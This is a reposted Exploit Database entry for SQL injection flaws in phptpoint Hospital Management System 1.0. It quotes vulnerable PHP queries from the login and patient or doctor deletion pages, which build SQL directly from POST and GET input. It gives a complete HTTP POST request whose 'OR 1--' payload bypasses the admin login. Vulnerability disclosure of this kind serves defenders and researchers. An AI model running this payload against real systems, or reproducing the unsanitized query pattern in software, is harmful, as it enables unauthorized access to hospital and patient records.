phptpoint Hospital Management System 1.0 – ‘user’ SQL injection

• Exploit Database
• 103 阅读

• 作者： Boumediene KADDOUR
  日期： 2018-10-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45683/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title:phptpoint Hospital Management System 1.0 - &apos;user&apos; SQL injection # Date: 2018-10-24 # Exploit Author: Boumediene KADDOUR # Unit: Algerie Telecom R&D Unit # Vendor Homepage: https://www.phptpoint.com/ # Software Link: # Version: 1 # Tested on: WAMP windows 10 x64 # CVE: unknown   # Description: # Phptpoint hospital management system suffers from multiple SQL injection vulnerabilities that # allow an attacker to bypass the login page and authenticate with admin, and then easily # get database information or execute arbitrary commands. # LOGIN.php SQL injection   13extract($_POST); 14if(isset($signIn)) 15{ 16 //echo $user,$pass; 17 //for Admin 18 $que=mysql_query("select user,pass from admin where user=&apos;$user&apos; and pass=&apos;$pass&apos;"); 19$row= mysql_num_rows($que); 20echo "raw ".$row; 21if($row) 22{ 23 $_SESSION[&apos;admin&apos;]=$user; 24 echo "<script>window.location=&apos;alist.php&apos;</script>";   # Payload:   POST /hospital/index.php HTTP/1.1 Host: 172.16.122.4 Content-Length: 38 Cache-Control: max-age=0 Origin: http://172.16.122.4 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://172.16.122.4/hospital/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7 Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85 Connection: close   user=admin%40gmail.com&apos;+OR+1--+&pass=anything&signIn=   # ALIST.php SQLi   33 $todel=$_GET[&apos;rno&apos;]; 34 mysql_query("update appt SET ashow=&apos;N&apos; where ano=&apos;$todel&apos; ;"); 35 }   # DUNDEL.php SQLi   21 $rno=$_GET["rno"]; 22 mysql_query("update doct set dshow=&apos;Y&apos; where dno=&apos;$rno&apos;"); 23 echo "<tr><td align=center><font size=4 color=green>SuccessfullyRecords Recovered</font></td></tr>"; 24echo "<tr><td align=center><a href=dlist.php>Continue...</a></td></tr>";   # PDEL.php SQLi   25 $todel=$_GET[&apos;rno&apos;]; 26 mysql_query("update Patient SET pshow=&apos;N&apos; where pno=&apos;$todel&apos; ;");   # PUNDEL.php SQLi   20 $rno=$_GET["rno"]; 21 22 23 mysql_query("update Patient set pshow=&apos;Y&apos; where pno=&apos;$rno&apos;"); 24 echo "<tr><td align=center><font size=4 color=green>SuccessfullyRecords Recovered</font></td></tr>"; 25 echo "<tr><td align=center><a href=plist.php>Continue...</a></td></tr>";